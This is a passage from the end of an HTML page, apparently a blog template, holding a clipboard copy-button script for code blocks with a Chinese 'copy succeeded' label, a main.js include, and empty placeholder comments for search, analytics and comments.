        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
